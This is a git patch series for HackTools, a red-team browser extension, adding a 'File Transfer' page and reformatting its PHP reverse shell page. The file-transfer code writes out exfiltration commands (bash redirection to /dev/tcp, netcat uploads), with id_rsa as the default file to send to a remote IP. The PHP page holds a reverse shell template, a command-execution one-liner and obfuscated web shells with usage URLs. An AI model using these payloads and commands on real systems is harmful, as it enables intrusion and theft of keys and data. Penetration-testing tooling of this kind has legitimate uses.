From 6cf7826bc707701d4d60abf4969393dacd3af557 Mon Sep 17 00:00:00 2001 From: Rb-x Date: Fri, 4 Sep 2020 23:09:30 +0200 Subject: [PATCH 1/2] =?UTF-8?q?adding=20few=20snippets=20of=20data-transfe?= =?UTF-8?q?r=20methods=20=F0=9F=93=A4=F0=9F=93=A5?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/components/LayoutApp.js | 33 ++- src/components/file_transfer/file_transfer.js | 254 ++++++++++++++++++ src/manifest.json | 4 +- yarn.lock | 27 -- 4 files changed, 279 insertions(+), 39 deletions(-) create mode 100644 src/components/file_transfer/file_transfer.js diff --git a/src/components/LayoutApp.js b/src/components/LayoutApp.js index f3e6c96..14f41a0 100644 --- a/src/components/LayoutApp.js +++ b/src/components/LayoutApp.js @@ -17,6 +17,7 @@ import SQLi from "./web/SqlInjection"; import AboutUs from "./AboutUs"; import FeedRSS from "./FeedRSS"; import SSTI from "./web/SSTI"; +import FileTransfer from "./file_transfer/File_transfer" const { Paragraph } = Typography; const { Sider, Content, Footer } = Layout; const IconFont = createFromIconfontCN({ @@ -96,6 +97,18 @@ export default (props) => { + } + onClick={() => goTo(FileTransfer)} + > + Transfer Methods + + { LFI { XSS { SQL Injection { Base64 Encoder / Decoder { Hashing { URL Encoder / Decoder { Hexadecimal Encoder / Decoder { SSTI { Feed RSS { Ludovic COULON - Riadh BOUCHAHOUA - 
HackTools Version - 0.1.4
+ 
HackTools Version - 0.2.0
diff --git a/src/components/file_transfer/file_transfer.js b/src/components/file_transfer/file_transfer.js new file mode 100644 index 0000000..28dd8ff --- /dev/null +++ b/src/components/file_transfer/file_transfer.js @@ -0,0 +1,254 @@ +import React, { useState } from "react"; +import { Button, message, Typography, Row, Col, Divider, Input } from "antd"; +import { + CopyOutlined, + WifiOutlined, + LinkOutlined, + createFromIconfontCN, +} from "@ant-design/icons"; +import QueueAnim from "rc-queue-anim"; +import Clipboard from "react-clipboard.js"; + +const { Title, Paragraph } = Typography; +const IconFont = createFromIconfontCN({ + scriptUrl: ["./iconfont.js"], +}); + +export default (props) => { + const [values, setValues] = useState({ + ip: "", + port: "", + file_name: "" + }); + const handleChange = (name) => (event) => { + setValues({ ...values, [name]: event.target.value }); + }; + const successInfoReverseShell = () => { + message.success("Your reverse shell has been copied"); + }; + const successInfoEncodeURL = () => { + message.success("Reverse shell URI encoded has been copied"); + }; + const bash_transfer = ` + bash -c 'echo -e "POST / HTTP/0.9\n\n$(<${values.file_name})" > /dev/tcp/${values.ip}/${values.port}' + `; + const bash_tcp_transfer = ` + bash -c 'cat ${values.file_name} > /dev/tcp/${values.ip}/${values.port}' + ` + + + const bash_download = `bash -c 'cat < /dev/tcp/${values.ip}/${values.port} > ${values.file_name}'` + const netcat_transfer = `nc ${values.ip} ${values.port} < ${values.file_name}`; + const python_server = `python3 -m http.server ${values.port}`; + const python2_server = `python -m SimpleHTTPServer ${values.port}` + const scp = `scp ${values.file_name} username@${values.ip || "IP"}:~/destination ${values.port && "-P " + values.port}` + const scp_dl = `scp user@${values.ip || "IP"}:~/path_to_file file_saved ${values.port && "-P " + values.port}` + return ( + + + File Transfer + + + Various method of data exfiltration and download from a remote machine. + +
+ + + } + name='Ip adress' + placeholder='IP Address or Host (ex: 212.212.111.222)' + onChange={handleChange("ip")} + /> + + + } + name='Port' + placeholder='Port (ex: 1337)' + onChange={handleChange("port")} + /> + + + } + name='File name' + placeholder='Filename (ex: script.sh)' + onChange={handleChange("file_name")} + /> + + +
+ +
+ + Bash Upload <IconFont type='icon-gnubash' /> + + + + + + # Upload file over HTTP (require HTTP service running on the attacker machine) + + + {bash_transfer} + + + + # Exfiltrate file over TCP + + + # listen with Netcat on port ${values.port} + output redirection + + + + + + nc -l -p ${values.port} {">"} data + + + + {bash_tcp_transfer} + + + + Bash Download <IconFont type='icon-gnubash' /> + + + + + + # send via netcat + + + nc -l -p {values.port} {"<"} {values.file_name} + + + # Download file on the other machine + + + + {bash_download} + +
+ +
+ + Netcat <IconFont type='icon-command-line' /> + + + + + # Upload + + + nc -l -p ${values.port} + + + nc ${values.ip} ${values.port} {"<"} ${values.file_name} + + + + {netcat_transfer} + + + + + # Download + + + nc {values.ip} {values.port} {"<"} {values.file_name} + + + nc -l -p {values.port} {">"} file_saved + + + + +
+ + +
+ + Python <IconFont type='icon-python' /> + + + + # Python3 HTTP Server + + + + {python_server} + + + + # Python2 HTTP Server + + + {python2_server} + + + + + wget http://{values.ip || "IP"}:{values.port || "port"}/{values.FILE || "filename"} + + + + +
+ + +
+ + SCP <IconFont type='icon-python' /> + + + + # Upload from local to remote + + + {scp} + + + # download from remote + + + {scp_dl} + + + + + + +
+ + + + + + + + + + + + ); +}; diff --git a/src/manifest.json b/src/manifest.json index 8d7a9ec..2ee34a3 100644 --- a/src/manifest.json +++ b/src/manifest.json @@ -1,6 +1,6 @@ { "name": "Hack Tools", - "version": "0.1.4", + "version": "0.2.0", "description": "The all in one Red team extension for web pentester", "browser_action": { "default_title": "Hack Tools", @@ -20,4 +20,4 @@ }, "manifest_version": 2, "devtools_page": "devtools.html" -} +} \ No newline at end of file diff --git a/yarn.lock b/yarn.lock index e8ed409..b9e0fc1 100644 --- a/yarn.lock +++ b/yarn.lock @@ -1135,13 +1135,6 @@ dependencies: regenerator-runtime "^0.13.4" -"@babel/runtime@^7.10.5": - version "7.11.2" - resolved "https://registry.yarnpkg.com/@babel/runtime/-/runtime-7.11.2.tgz#f549c13c754cc40b87644b9fa9f09a6a95fe0736" - integrity sha512-TeWkU52so0mPtDcaCTxNBI/IHiz0pZgr8VEFqXFtZWpYD08ZB6FaSwVAS8MKRQAP3bYKiVjwysOJgMFY28o6Tw== - dependencies: - regenerator-runtime "^0.13.4" - "@babel/template@^7.10.1", "@babel/template@^7.10.3", "@babel/template@^7.4.0", "@babel/template@^7.8.6": version "7.10.3" resolved "https://registry.yarnpkg.com/@babel/template/-/template-7.10.3.tgz#4d13bc8e30bf95b0ce9d175d30306f42a2c9a7b8" @@ -6972,14 +6965,6 @@ map-visit@^1.0.0: dependencies: object-visit "^1.0.0" -match-sorter@^4.1.0: - version "4.2.0" - resolved "https://registry.yarnpkg.com/match-sorter/-/match-sorter-4.2.0.tgz#70c4e7443dacf5fa2503bc5afc189024092e9d27" - integrity sha512-oEvLn8R+a30YZ9l5XdCTkYQuLsOs8frxEqQTAuxoqkQx/qV5pQpx/NqAWvJ5xbYecqfXoF/ZevaIS1+NkbRymg== - dependencies: - "@babel/runtime" "^7.10.5" - remove-accents "0.4.2" - md5.js@^1.3.4: version "1.3.5" resolved "https://registry.yarnpkg.com/md5.js/-/md5.js-1.3.5.tgz#b5d07b8e3216e3e27cd728d72f70d1e6a342005f" @@ -9276,13 +9261,6 @@ react-lifecycles-compat@^3.0.4: resolved "https://registry.yarnpkg.com/react-lifecycles-compat/-/react-lifecycles-compat-3.0.4.tgz#4f1a273afdfc8f3488a8c516bfda78f872352362" integrity sha512-fBASbA6LnOU9dOU2eW7aQ8xmYBSXUIWr+UmF9b1efZBazGNO+rcXT/icdKnYm2pTwcRylVUYwW7H1PHfLekVzA== -react-query-devtools@^2.4.4: - version "2.4.4" - resolved "https://registry.yarnpkg.com/react-query-devtools/-/react-query-devtools-2.4.4.tgz#b179e5f5a0fd17027a66c59f782d051577eb79fb" - integrity sha512-ojVrdGZHuY4CXZzj4Q4VgT20fJB70quGwCONpNkLPG2s7C8u/7e6ZJQjoSySZ3WFydgvJqKxcHmIZuPGHqP6Vw== - dependencies: - match-sorter "^4.1.0" - react-query@^2.5.13: version "2.5.13" resolved "https://registry.yarnpkg.com/react-query/-/react-query-2.5.13.tgz#0948e044416562c4c58c966c27387ce4037bbf5a" @@ -9525,11 +9503,6 @@ relateurl@0.2.x: resolved "https://registry.yarnpkg.com/relateurl/-/relateurl-0.2.7.tgz#54dbf377e51440aca90a4cd274600d3ff2d888a9" integrity sha1-VNvzd+UUQKypCkzSdGANP/LYiKk= -remove-accents@0.4.2: - version "0.4.2" - resolved "https://registry.yarnpkg.com/remove-accents/-/remove-accents-0.4.2.tgz#0a43d3aaae1e80db919e07ae254b285d9e1c7bb5" - integrity sha1-CkPTqq4egNuRngeuJUsoXZ4ce7U= - remove-trailing-separator@^1.0.1: version "1.1.0" resolved "https://registry.yarnpkg.com/remove-trailing-separator/-/remove-trailing-separator-1.1.0.tgz#c24bce2a283adad5bc3f58e0d48249b92379d8ef" From 7820392922c865ee1899b2aba211e81c8cd6c563 Mon Sep 17 00:00:00 2001 From: LasCC Date: Sat, 5 Sep 2020 00:09:21 +0200 Subject: [PATCH 2/2] =?UTF-8?q?Update=20File=20Transfer=20=F0=9F=A5=B3?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 7 +- src/assets/img/icons/iconfont.js | 2 +- src/components/LayoutApp.js | 456 +++++----- src/components/PhpReverseShell.js | 818 +++++++++--------- src/components/file_transfer/file_transfer.js | 408 ++++----- 5 files changed, 810 insertions(+), 881 deletions(-) diff --git a/README.md b/README.md index f857e80..b5c0ee7 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ logo_hack_tools

Welcome to HackTools 🛠

- Version + Version release mozilla @@ -39,6 +39,9 @@ With the extension you **no longer need to search for payloads in different webs - Base64 Encoder / Decoder - Hash Generator (MD5, SHA1, SHA256, SHA512) - Useful Linux commands (Port Forwarding, SUID) +- RSS Feed (Exploit DB and Cisco Security Advisories) +- CVE Search Engine +- Various method of data exfiltration and download from a remote machine ## Preview @@ -58,7 +61,7 @@ With the extension you **no longer need to search for payloads in different webs preview_4 -# Install the application +# Install the extension ## Chromium based browser diff --git a/src/assets/img/icons/iconfont.js b/src/assets/img/icons/iconfont.js index d3e880e..9988e9f 100644 --- a/src/assets/img/icons/iconfont.js +++ b/src/assets/img/icons/iconfont.js @@ -1 +1 @@ -!function(t){var c,l,h,a,o,e,i,s='',v=(c=document.getElementsByTagName("script"))[c.length-1].getAttribute("data-injectcss");if(v&&!t.__iconfont__svg__cssinject__){t.__iconfont__svg__cssinject__=!0;try{document.write("")}catch(t){console&&console.log(t)}}function m(){e||(e=!0,a())}l=function(){var t,c,l,h,a,o=document.createElement("div");o.innerHTML=s,s=null,(t=o.getElementsByTagName("svg")[0])&&(t.setAttribute("aria-hidden","true"),t.style.position="absolute",t.style.width=0,t.style.height=0,t.style.overflow="hidden",c=t,(l=document.body).firstChild?(h=c,(a=l.firstChild).parentNode.insertBefore(h,a)):l.appendChild(c))},document.addEventListener?~["complete","loaded","interactive"].indexOf(document.readyState)?setTimeout(l,0):(h=function(){document.removeEventListener("DOMContentLoaded",h,!1),l()},document.addEventListener("DOMContentLoaded",h,!1)):document.attachEvent&&(a=l,o=t.document,e=!1,(i=function(){try{o.documentElement.doScroll("left")}catch(t){return void setTimeout(i,50)}m()})(),o.onreadystatechange=function(){"complete"==o.readyState&&(o.onreadystatechange=null,m())})}(window); \ No newline at end of file +!function(t){var c,l,h,a,o,i,e,s='',v=(c=document.getElementsByTagName("script"))[c.length-1].getAttribute("data-injectcss");if(v&&!t.__iconfont__svg__cssinject__){t.__iconfont__svg__cssinject__=!0;try{document.write("")}catch(t){console&&console.log(t)}}function m(){i||(i=!0,a())}l=function(){var t,c,l,h,a,o=document.createElement("div");o.innerHTML=s,s=null,(t=o.getElementsByTagName("svg")[0])&&(t.setAttribute("aria-hidden","true"),t.style.position="absolute",t.style.width=0,t.style.height=0,t.style.overflow="hidden",c=t,(l=document.body).firstChild?(h=c,(a=l.firstChild).parentNode.insertBefore(h,a)):l.appendChild(c))},document.addEventListener?~["complete","loaded","interactive"].indexOf(document.readyState)?setTimeout(l,0):(h=function(){document.removeEventListener("DOMContentLoaded",h,!1),l()},document.addEventListener("DOMContentLoaded",h,!1)):document.attachEvent&&(a=l,o=t.document,i=!1,(e=function(){try{o.documentElement.doScroll("left")}catch(t){return void setTimeout(e,50)}m()})(),o.onreadystatechange=function(){"complete"==o.readyState&&(o.onreadystatechange=null,m())})}(window); \ No newline at end of file diff --git a/src/components/LayoutApp.js b/src/components/LayoutApp.js index 14f41a0..dfaa6cb 100644 --- a/src/components/LayoutApp.js +++ b/src/components/LayoutApp.js @@ -1,7 +1,7 @@ import React from "react"; -import { Layout, Menu, Typography } from "antd"; +import { Layout, Menu, Typography, Badge } from "antd"; import { CopyrightCircleOutlined } from "@ant-design/icons"; -import { createFromIconfontCN, DatabaseOutlined } from "@ant-design/icons"; +import { createFromIconfontCN } from "@ant-design/icons"; import { goTo } from "react-chrome-extension-router"; import ReverseShell from "./ReverseShell"; import PhpReverseShell from "./PhpReverseShell"; @@ -17,236 +17,236 @@ import SQLi from "./web/SqlInjection"; import AboutUs from "./AboutUs"; import FeedRSS from "./FeedRSS"; import SSTI from "./web/SSTI"; -import FileTransfer from "./file_transfer/File_transfer" +import FileTransfer from "./file_transfer/File_transfer"; const { Paragraph } = Typography; const { Sider, Content, Footer } = Layout; const IconFont = createFromIconfontCN({ - scriptUrl: ["./iconfont.js"], + scriptUrl: ["./iconfont.js"], }); export default (props) => { - return ( - - -

- - - - - -
- - - } - onClick={() => goTo(ReverseShell)} - > - Reverse Shell - - - } - onClick={() => goTo(PhpReverseShell)} - > - PHP Reverse Shell - - - } - onClick={() => goTo(TtySpawnShell)} - > - TTY Spawn Shell - - - } - onClick={() => goTo(LinuxCommands)} - > - Useful Linux commands - - - } - onClick={() => goTo(FileTransfer)} - > - Transfer Methods - - - } - onClick={() => goTo(LFI)} - > - LFI - - - } - onClick={() => goTo(XSS)} - > - XSS - - - } - onClick={() => goTo(SQLi)} - > - SQL Injection - - - } - onClick={() => goTo(Base64Encode)} - > - Base64 Encoder / Decoder - - - } - onClick={() => goTo(Hashing)} - > - Hashing - - - } - onClick={() => goTo(URLDecode)} - > - URL Encoder / Decoder - - - } - onClick={() => goTo(HexEncode)} - > - Hexadecimal Encoder / Decoder - - - } - onClick={() => goTo(SSTI)} - > - SSTI - - - } - onClick={() => goTo(FeedRSS)} - > - Feed RSS - - - } - onClick={() => goTo(AboutUs)} - > - About us - - - - - -
- {props.children} -
- -
- Hack Tools - The all in one Red team - browser extension for web pentesters - - Ludovic COULON - Riadh BOUCHAHOUA - - 
HackTools Version - 0.2.0
-
- - - ); + return ( + + +
+ + + + + +
+ + + } + onClick={() => goTo(ReverseShell)} + > + Reverse Shell + + + } + onClick={() => goTo(PhpReverseShell)} + > + PHP Reverse Shell + + + } + onClick={() => goTo(TtySpawnShell)} + > + TTY Spawn Shell + + + } + onClick={() => goTo(LinuxCommands)} + > + Useful Linux commands + + + } + onClick={() => goTo(FileTransfer)} + > + Transfer Methods + + + } + onClick={() => goTo(LFI)} + > + LFI + + + } + onClick={() => goTo(XSS)} + > + XSS + + + } + onClick={() => goTo(SQLi)} + > + SQL Injection + + + } + onClick={() => goTo(Base64Encode)} + > + Base64 Encoder / Decoder + + + } + onClick={() => goTo(Hashing)} + > + Hashing + + + } + onClick={() => goTo(URLDecode)} + > + URL Encoder / Decoder + + + } + onClick={() => goTo(HexEncode)} + > + Hexadecimal Encoder / Decoder + + + } + onClick={() => goTo(SSTI)} + > + SSTI + + + } + onClick={() => goTo(FeedRSS)} + > + Feed RSS + + + } + onClick={() => goTo(AboutUs)} + > + About us + + + + + +
+ {props.children} +
+ +
+ Hack Tools - The all in one Red team + browser extension for web pentesters + + Ludovic COULON - Riadh BOUCHAHOUA + + 
HackTools Version - 0.2.0
+
+ + + ); }; diff --git a/src/components/PhpReverseShell.js b/src/components/PhpReverseShell.js index c2a4510..d040ea3 100644 --- a/src/components/PhpReverseShell.js +++ b/src/components/PhpReverseShell.js @@ -1,20 +1,20 @@ import React, { useState } from "react"; import { - Input, - Button, - message, - Typography, - Row, - Col, - Divider, - Collapse, + Input, + Button, + message, + Typography, + Row, + Col, + Divider, + Collapse, } from "antd"; import { - CopyOutlined, - WifiOutlined, - DownloadOutlined, - ArrowsAltOutlined, - createFromIconfontCN, + CopyOutlined, + WifiOutlined, + DownloadOutlined, + ArrowsAltOutlined, + createFromIconfontCN, } from "@ant-design/icons"; import QueueAnim from "rc-queue-anim"; import Clipboard from "react-clipboard.js"; @@ -22,29 +22,29 @@ import Clipboard from "react-clipboard.js"; const { Title, Paragraph } = Typography; const { Panel } = Collapse; const IconFont = createFromIconfontCN({ - scriptUrl: ["./iconfont.js"], + scriptUrl: ["./iconfont.js"], }); export default (props) => { - const [values, setValues] = useState({ - ip: "", - port: "", - }); - const handleChange = (name) => (event) => { - setValues({ ...values, [name]: event.target.value }); - }; - const successInfoReverseShell = () => { - message.success("Your reverse shell has been copied"); - }; - const oneLiner = `"; - const shell_obfuscate_function = - `;").($_^"/"); ?>` + - ""; + const [values, setValues] = useState({ + ip: "", + port: "", + }); + const handleChange = (name) => (event) => { + setValues({ ...values, [name]: event.target.value }); + }; + const successInfoReverseShell = () => { + message.success("Your reverse shell has been copied"); + }; + const oneLiner = `"; + const shell_obfuscate_function = + `;").($_^"/"); ?>` + + ""; - const phpReverseShell = ` + const phpReverseShell = ` { ?> `; - return ( - - - PHP Reverse Shell - - - Attackers who successfully exploit a remote command execution - vulnerability can use a reverse shell to obtain an interactive shell - session on the target machine and continue their attack. - -
- - - } - name='Ip adress' - placeholder='IP Address (ex: 212.212.111.222)' - onChange={handleChange("ip")} - /> - - - } - name='Port' - placeholder='Port (ex: 1337)' - onChange={handleChange("port")} - /> - - -
- -
- Pentestmonkey's reverse shell - - This script will make an outbound TCP connection to a hardcoded IP and - port. - - - -

{phpReverseShell}

- - - - - - - -
- -
- Basic RCE - - When you have successfully uploaded your payload, just put your - commands after the variable ?cmd= (ex: ?cmd=ls -la") - - {oneLiner} - - - - -
- -
- Web shell - - p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used - to quickly execute commands on a server when pentesting a PHP - application. - - - - pownyShell - - - - -
- -
- Obfuscate PHP Web Shell - {""} - - {" Usage : http://target.com/path/to/shell.php?0=command "} - - - "}> - - -
- -
- {""} - - { - ' Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command" ' - } - - - "}> - - -
- -
- {""} - Usage : - - http://target.com/path/to/shell.php?_=command - - - curl -X POST http://target.com/path/to/shell.php -d "_=command" ' - - - "} - > - - -
- -
- {shell_obfuscate} - Usage : - - http://target.com/path/to/shell.php?0=command - - - - -
- -
- {shell_obfuscate_function} - Usage : - - - http://target.com/path/to/shell.php?_=function&__=argument - - - - http://target.com/path/to/shell.php?_=system&__=ls - - - - - -
- - ); + return ( + + + PHP Reverse Shell + + + Attackers who successfully exploit a remote command execution + vulnerability can use a reverse shell to obtain an interactive shell + session on the target machine and continue their attack. + +
+ + + } + name='Ip adress' + placeholder='IP Address (ex: 212.212.111.222)' + onChange={handleChange("ip")} + /> + + + } + name='Port' + placeholder='Port (ex: 1337)' + onChange={handleChange("port")} + /> + + +
+ +
+ Pentestmonkey's reverse shell + + This script will make an outbound TCP connection to a hardcoded IP and + port. + + + +

{phpReverseShell}

+ + + + + + + +
+ +
+ Basic RCE + + When you have successfully uploaded your payload, just put your + commands after the variable ?cmd= (ex: ?cmd=ls -la") + + {oneLiner} + + + + +
+ +
+ Web shell + + p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used + to quickly execute commands on a server when pentesting a PHP + application. + + + + pownyShell + + + + +
+ +
+ Obfuscate PHP Web Shell + {""} + + {" Usage : http://target.com/path/to/shell.php?0=command "} + + + "}> + + +
+ +
+ {""} + + { + ' Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command" ' + } + + + "}> + + +
+ +
+ {""} + Usage : + - http://target.com/path/to/shell.php?_=command + + - curl -X POST http://target.com/path/to/shell.php -d "_=command" ' + + + "} + > + + +
+ +
+ {shell_obfuscate} + Usage : + - http://target.com/path/to/shell.php?0=command + + + + +
+ +
+ {shell_obfuscate_function} + Usage : + + - http://target.com/path/to/shell.php?_=function&__=argument + + + - http://target.com/path/to/shell.php?_=system&__=ls + + + + + +
+ + ); }; diff --git a/src/components/file_transfer/file_transfer.js b/src/components/file_transfer/file_transfer.js index 28dd8ff..26f0273 100644 --- a/src/components/file_transfer/file_transfer.js +++ b/src/components/file_transfer/file_transfer.js @@ -1,254 +1,180 @@ import React, { useState } from "react"; -import { Button, message, Typography, Row, Col, Divider, Input } from "antd"; +import { Typography, Row, Col, Divider, Input } from "antd"; import { - CopyOutlined, - WifiOutlined, - LinkOutlined, - createFromIconfontCN, + WifiOutlined, + createFromIconfontCN, + FolderOutlined, } from "@ant-design/icons"; import QueueAnim from "rc-queue-anim"; -import Clipboard from "react-clipboard.js"; -const { Title, Paragraph } = Typography; +const { Title, Paragraph, Text } = Typography; const IconFont = createFromIconfontCN({ - scriptUrl: ["./iconfont.js"], + scriptUrl: ["./iconfont.js"], }); export default (props) => { - const [values, setValues] = useState({ - ip: "", - port: "", - file_name: "" - }); - const handleChange = (name) => (event) => { - setValues({ ...values, [name]: event.target.value }); - }; - const successInfoReverseShell = () => { - message.success("Your reverse shell has been copied"); - }; - const successInfoEncodeURL = () => { - message.success("Reverse shell URI encoded has been copied"); - }; - const bash_transfer = ` + const [values, setValues] = useState({ + ip: "10.10.164.167", + port: "1337", + file_name: "id_rsa", + }); + const handleChange = (name) => (event) => { + setValues({ ...values, [name]: event.target.value }); + }; + const bash_transfer = ` bash -c 'echo -e "POST / HTTP/0.9\n\n$(<${values.file_name})" > /dev/tcp/${values.ip}/${values.port}' `; - const bash_tcp_transfer = ` + const bash_tcp_transfer = ` bash -c 'cat ${values.file_name} > /dev/tcp/${values.ip}/${values.port}' - ` - - - const bash_download = `bash -c 'cat < /dev/tcp/${values.ip}/${values.port} > ${values.file_name}'` - const netcat_transfer = `nc ${values.ip} ${values.port} < ${values.file_name}`; - const python_server = `python3 -m http.server ${values.port}`; - const python2_server = `python -m SimpleHTTPServer ${values.port}` - const scp = `scp ${values.file_name} username@${values.ip || "IP"}:~/destination ${values.port && "-P " + values.port}` - const scp_dl = `scp user@${values.ip || "IP"}:~/path_to_file file_saved ${values.port && "-P " + values.port}` - return ( - - - File Transfer - - - Various method of data exfiltration and download from a remote machine. - -
- - - } - name='Ip adress' - placeholder='IP Address or Host (ex: 212.212.111.222)' - onChange={handleChange("ip")} - /> - - - } - name='Port' - placeholder='Port (ex: 1337)' - onChange={handleChange("port")} - /> - - - } - name='File name' - placeholder='Filename (ex: script.sh)' - onChange={handleChange("file_name")} - /> - - -
- -
- - Bash Upload <IconFont type='icon-gnubash' /> - - - - - - # Upload file over HTTP (require HTTP service running on the attacker machine) - - - {bash_transfer} - - - - # Exfiltrate file over TCP - - - # listen with Netcat on port ${values.port} + output redirection - - - - - - nc -l -p ${values.port} {">"} data - - - - {bash_tcp_transfer} - - - - Bash Download <IconFont type='icon-gnubash' /> - - - - - - # send via netcat - - - nc -l -p {values.port} {"<"} {values.file_name} - - - # Download file on the other machine - - - - {bash_download} - -
- -
- - Netcat <IconFont type='icon-command-line' /> - - - - - # Upload - - - nc -l -p ${values.port} - - - nc ${values.ip} ${values.port} {"<"} ${values.file_name} - - - - {netcat_transfer} - - - - - # Download - - - nc {values.ip} {values.port} {"<"} {values.file_name} - - - nc -l -p {values.port} {">"} file_saved - - - - -
- - -
- - Python <IconFont type='icon-python' /> - - - - # Python3 HTTP Server - - - - {python_server} - - - - # Python2 HTTP Server - - - {python2_server} - - - - - wget http://{values.ip || "IP"}:{values.port || "port"}/{values.FILE || "filename"} - - - - -
- - -
- - SCP <IconFont type='icon-python' /> - - - - # Upload from local to remote - - - {scp} - - - # download from remote - - - {scp_dl} - - - - - - -
- - - - - - - - - - - - ); + `; + const bash_download = `bash -c 'cat < /dev/tcp/${values.ip}/${values.port} > ${values.file_name}'`; + const netcat_transfer = `nc ${values.ip} ${values.port} < ${values.file_name}`; + const python_server = `python3 -m http.server ${values.port}`; + const python2_server = `python -m SimpleHTTPServer ${values.port}`; + const scp = `scp ${values.file_name} username@${ + values.ip || "IP" + }:~/destination ${values.port && "-P " + values.port}`; + const scp_dl = `scp user@${values.ip || "IP"}:~/path_to_file file_saved ${ + values.port && "-P " + values.port + }`; + + return ( + + + File Transfer + + + Various method of data exfiltration and download from a remote machine. + +
+ + + } + name='Ip adress' + placeholder='IP Address or Host (ex: 212.212.111.222)' + onChange={handleChange("ip")} + /> + + + } + name='Port' + placeholder='Port (ex: 1337)' + onChange={handleChange("port")} + /> + + + } + name='File name' + placeholder='Filename (ex: script.sh)' + onChange={handleChange("file_name")} + /> + + +
+ +
+ + Bash Upload <IconFont type='icon-gnubash' /> + + + # Upload file over HTTP (require HTTP service running on the attacker + machine) + + + {bash_transfer} + + + # Exfiltrate file over TCP + + + # Listen with Netcat on port {values.port} + output redirection + + + nc -l -p {values.port} {">"} data + + + {bash_tcp_transfer} + + + Bash Download <IconFont type='icon-gnubash' /> + + # Send via netcat + + nc -l -p {values.port} {"<"} {values.file_name} + + # Download file on the other machine + + {bash_download} + +
+ +
+ + Netcat <IconFont type='icon-command-line' /> + + # Upload payload + nc -lnvp {values.port} + + {netcat_transfer} + + + # Download + + + nc {values.ip} {values.port} {"<"} {values.file_name} + + + nc -lnvp {values.port} {">"} file_saved + +
+ +
+ + Python <IconFont type='icon-python' /> + + # Python3 HTTP Server + + {python_server} + + # Python2 HTTP Server + + {python2_server} + +
+ +
+ + SCP <IconFont type='icon-filelock' /> + + # Upload from local host to remote computer + + {scp} + + # Download from remote computer + + {scp_dl} + +
+ + ); };